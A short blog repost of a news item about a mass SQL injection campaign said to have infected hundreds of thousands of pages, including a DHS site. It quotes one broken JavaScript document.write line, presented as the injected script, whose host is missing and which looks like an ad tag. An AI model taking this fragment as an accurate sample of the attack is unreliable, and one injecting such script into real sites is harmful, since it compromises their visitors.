Department of Homeland Security website hacked!

The sophisticated mass infection that’s injecting attack code into hundreds of thousands of reputable web pages is growing and even infiltrated the website of the Department of Homeland Security.

While so-called SQL injections are nothing new, this latest attack, which we we reported earlier, is notable for its ability to infect huge numbers of pages using only a single string of text. At time of writing, Google searches here, here and here showed almost 520,000 pages containing the infection string, though the exact number changes almost constantly. As the screenshot below shows, even the DHS, which is responsible for protecting US infrastructure against cyber attacks, wasn’t immune. Other hacked sites include those belonging to the United Nations and the UK Civil Service.

document.write(‚\x3Cscript src=“;cta=’+cta+‘;ctb=’+ctb+‘;ctc=’+ctc+‘;sc=’+sc+‘;cid=’+cid+‘;’+RegExCats+GetVCs()+’pid=’+RegId+RegDT+‘;’+RegKW+’maid=’+maid+‘;test=’+test+‘;pf=’+RegPF+‘;dcove=d;sz=336×280;tile=3;ord=‘ + rand + ‚?“ type=“text/javascript“>\x3C\/script>‘);

Screenshot of Google search showing DHS website


Explore posts in the same categories: Hacker, News, Nicht kategorisiert, Security


You can comment below, or link to this permanent URL from your own site.

Kommentar verfassen

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

Du kommentierst mit Deinem Abmelden / Ändern )


Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )


Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s

%d Bloggern gefällt das: